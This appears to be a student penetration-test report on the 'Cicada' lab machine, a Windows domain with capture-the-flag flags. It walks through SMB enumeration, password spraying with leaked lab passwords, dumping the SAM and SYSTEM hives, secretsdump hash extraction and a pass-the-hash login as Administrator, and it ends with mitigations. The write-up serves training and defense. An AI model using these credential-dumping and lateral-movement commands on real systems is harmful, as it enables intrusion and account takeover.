Penetration Testing Report - Cicada

[email protected]

Netanel Rubinov
Date: 23/12/2024
Copyright © 2024 ITSafe Ltd. All rights reserved.
No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any
broadcast for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without
.prior written permission from ITSAFE Cyber College

Executive Summary
Introduction

Penetration testing of the Windows infrastructure was conducted to evaluate the system's
security posture. This thorough assessment, carried out by ITSafe, involved a gray box security
audit to assess the infrastructure's resilience against potential attacks and identify areas for
improving data protection.

Scope
 Finding Classification
Severity
The finding’s severity relates to the impact which might be inflicted to the organization
due to that finding. The severity level can be one of the following options, and is
determined by the specific attack scenario:
Critical – Critical level findings may cause significant business damage to the organization,
such as:
● Significant data leakage
● Denial of Service to essential systems
● Gaining control of the organization’s resources (For example Servers,
Routers, etc.)
High – High-level findings may cause damage to the organization, such as:
● Data leakage
● Execution of unauthorized actions
● Insecure communication
● Denial of Service
● Bypassing security mechanisms
● Inflicting various business damage
Medium – Medium level findings may increase the probability of carrying out attacks or
performing a small amount of damage to the organization, such as –
● Discoveries that make it easier to conduct other attacks
● Findings that may increase the amount of damage that an attacker can
inflict, once he carries out a successful attack
● Findings which may inflict a low level of damage to the organization
Low – Low-level findings may inflict a marginal cost to the organization, or assist the
attacker when performing an attack, such as –
● Providing the attacker with valuable information to help plan the attack
● Findings that may inflict marginal damage to the organization
● Results that may slightly help the attacker when carrying out an attack, or
remaining undetected
Informative – Informative findings are findings without any information security impact.
However, they are still brought to the attention of the organization.

Conclusions

During the system's stress test, 4 security vulnerabilities were identified:

 From our professional perspective, the overall security level of the system is Medium-High.
The application is vulnerable to Injection attacks.
Due to the absence of a rate limit, we have access to the administrative pane to do some
activities as other users.

Identified Vulnerabilities
Item Test Type Risk Level Topic General Explanation Status

Username The system is exposed to enumeration and brute-

1 infrastructure High spraying smb force attacks on SMB services, allowing Vulnerable
access unauthorized access to shared resources.

Plaintext Credentials refers to a situation where

access details such as passwords and usernames are
stored or transmitted in an unencrypted form. This
Plaintext presents a high security risk, as any party with access
2 infrastructure High Vulnerable
credentials to the information can read and use the credentials.

Information Disclosure (Enumeration) occurs when

an attacker gains unauthorized access to sensitive
Information system information, such as valid usernames, shared
3 Infrastructure Medium Vulnerable
Disclosure resources, or system configurations, which can be
exploited for further attacks

The described situation indicates an insecure

Improper
remote access configuration on the system, allowing
Remote
4 Infrastructure Medium unauthorized parties to connect and retrieve Vulnerable
Access
sensitive files such as SAM and SYSTEM files
Configuration

Walk through
Using Nmap to scan the target machine for open ports and services:

“nmap -p- -A -sC -sV -T4 10.10.11.35”

● This revealed several open ports and services, including SMB (445) and Kerberos
(88), indicating that SMB might be exploitable.

Explored the SMB service with the following command, which identified that anonymous
access was allowed: “smbclient -L \\10.10.11.35"

● Result: Access to several shares was possible, including HR.

Access to SMB Share:

Using smbclient to connect to the HR share:

“smbclient \\10.10.11.35\HR –user "anonymous"

After transferring the file “Notice from HR.txt” to my Kali and opening it, I see a note
containing some users' default passwords.

After transferring the file “Notice from HR.txt” to my Kali and opening it, I see a note
containing some users' default passwords Brute-Force User Enumeration:
Using nxc smb to perform a user enumeration with brute-force techniques:
“nxc smb 10.10.11.35 -u 'anonymous' -p '' --rid-brute”

● Result: Identified several potential users within the Active Directory domain.

Extracting AD Users:
Using a command to extract users from the SMB share and filter out domain users:

“cat users.txt | grep -o 'CICADA\\[^ ]*' | awk -F'\\' '{print $2}' > users.txt”

● Result: Extracted a list of domain users, providing a list of targets for password
guessing.

Cracking SMB Passwords:

Attempted to authenticate using valid credentials and extracted users that could be using in
the following mentioned credentials:

“nxc smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'”

● Result: Successful authentication with the user michael.wrightson,After performing

SMB enumeration with the user michael.wrightson, we found another password
related to the user david.orelious on the description of that user.
Accessing Shares Using Credentials:
Connected to the DEV share using credentials for david.orelious:

“smbclient //10.10.11.35/DEV –user "david.orelious"

● Result: Gained access to another directory containing further files.

Inspecting the PowerShell script, I found another credential for the user
emily.oscars.

Access via WinRM:

Successfully authenticated via WinRM using emily.oscars' credentials:

evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

● Result: Obtained command-line access to the target system and found the user’s
flag.
Privilege Escalation:
Escalated privileges by downloading using reg save to dump the SAM and SYSTEM hives
on the C:\Temp folder :

“reg save hklm\sam c:\Temp\sam”

“reg save hklm\system c:\Temp\system”
“download SYSTEM”
“download SAM”

● Result: Dumped critical system files needed for hash extraction.

Hash Extraction Using Impacket:

Ran impacket-secretsdump to extract credentials from the SAM and SYSTEM files:

“impacket-secretsdump -sam SAM -system SYSTEM LOCAL”

 ● Result: Retrieved password hashes for the Administrator account.

4.5 Final Access

Administrator Access:
Used the extracted NTLM hash to authenticate as Administrator:

evil-winrm -i 10.10.11.35 -u 'Administrator' -H

'2b87e7c93a3e8a0ea4a581937016f341'

● Result: Gained Domain Administrator access.

Finding Details:

Password spraying
Severity | High Probability | High

Vulnerability description:

The system is exposed to enumeration and brute-force attacks on SMB services, allowing
unauthorized access to shared resources. Without sufficient protections such as account
lockout policies or strong authentication mechanisms, attackers can repeatedly attempt
login combinations, potentially revealing valid credentials. This vulnerability can lead to
unauthorized access to sensitive data and increase the risk of exploitation. Below is a
detailed description of the steps taken to exploit this weakness.

Vulnerability Detail:

I conducted a username spraying attack using the NETEXEC tool, leveraging the usernames I
had collected from enumeration. By cross-referencing these with the password found in the
shared file, I successfully identified that the password belonged to the user "Micheal":

I also performed USERNAME SPRAYING when I found the password in the object
description by querying the LDAP and found that the password belongs to the user
:”"DAVID

Mitigations:

 Account Lockout Policy: An account lockout policy should be configured to lock

accounts after a certain number of failed login attempts. This policy can slow down or
 block username spraying attacks on SMB, limiting the damage caused by unauthorized
login attempts.
 The system should be actively monitored to detect unauthorized connection attempts,
and an IDS/IPS system should be implemented that can alert on username spraying
attacks.

----------------------------------------------------------------------------------------------------------------------------------

Plaintext credentials
Severity | High Probability | High

Vulnerability description:

Plaintext Credentials refers to a situation where access details such as passwords and
usernames are stored or transmitted in an unencrypted form. This presents a high security
risk, as any party with access to the information can read and use the credentials.

Vulnerability Detail:

After identifying the shared drives and folders, I attempted an anonymous connection. Upon
successfully connecting, I discovered the HR.TXT file, which I downloaded to my machine.
Inside the file, I found a password for one of the users:

After connecting to the LDAP protocol using the details I found, I performed a query using
LDAP SEARCH and attempted additional input on the system. In one of my attempts, I
searched for the word "PASSWORD" in the information and found that someone had left it
in the description of an object, revealing another password.
After finding the login details for the user DAVID, I connected via the SMB protocol and
discovered a file named Backup_script.psl. This file contained the username and password
:for the user Amelie in CLEARTEXT

I added EMILY's user to the SMB protocol and on her desktop there is a USER.TXT file
:that contains the first flag

Mitigations:

 Account Lockout Policy: An account lockout policy should be configured to lock

accounts after a certain number of failed login attempts. This policy can slow down or
block username spraying attacks on SMB, limiting the damage caused by unauthorized
login attempts.
 The system should be actively monitored to detect unauthorized connection attempts,
and an IDS/IPS system should be implemented that can alert on username spraying
attacks
Information Disclosure:
Severity | Medium Probability | High

Vulnerability Description:
Information Disclosure (Enumeration) occurs when an attacker gains unauthorized access
to sensitive system information, such as valid usernames, shared resources, or system
configurations, which can be exploited for further attacks. For example, using SMB, an
attacker may enumerate shared folders or user accounts. This type of vulnerability arises
when systems provide excessive details in error messages or poorly configured access
controls, allowing attackers to gather crucial information.

Vulnerability Details:
Enumeration is the first step I took in testing. In order to discover which ports are open and
which services exist, I performed the scan with Nmap:

The following command is indeed used to perform enumeration of shared folders on an

SMB server:

After discovering the password in the file, I proceeded to enumerate the existing users using
the NETEXEC tool over the SMB protocol:
Mitigation:

 Disable Anonymous SMB Access: Block unauthenticated SMB access by disabling the
"guest" account and enforcing stronger authentication (e.g., NTLMv2, Kerberos).
 Restrict SMB Shares: Use ACLs to limit access to shared folders and avoid storing
sensitive data (e.g., passwords) in shared locations. Regularly audit SMB shares for
unauthorized access.

------------------------------------------------------------------------------------------------------------------------

Improper Remote Access Configuration

Severity | High Probability | Medium

Vulnerability description:

The described situation indicates an insecure remote access configuration on the system,
allowing unauthorized parties to connect and retrieve sensitive files such as SAM and
SYSTEM files, which contain critical information about users, passwords, and security
policies. The use of tools like EVILWINRM does not require stringent authentication
measures or appropriate access restrictions, leading to the exposure of sensitive data and
security weaknesses.

Vulnerability Detail:

These files contain sensitive information, including password hashes. By using

SECRETDUMP, I was able to extract the password hash of the admin user. This extraction
increases the security risk, as it could potentially allow an attacker to gain unauthorized
access to the system. This issue indicates insufficient access controls and authentication
mechanisms in place to protect sensitive data and user credentials:

I did connected to Administrator account by the NLTM HASH (PTT):

And I found the last flag on the Desktop administrator’s :

Mitigation:
 Limit or disable the WinRM service if not needed and connect only through HTTPS with
encryption.

 Restrict access to critical files like SAM and SYSTEM by limiting permissions, using file
access controls, and ensuring only authorized users can access or download these files.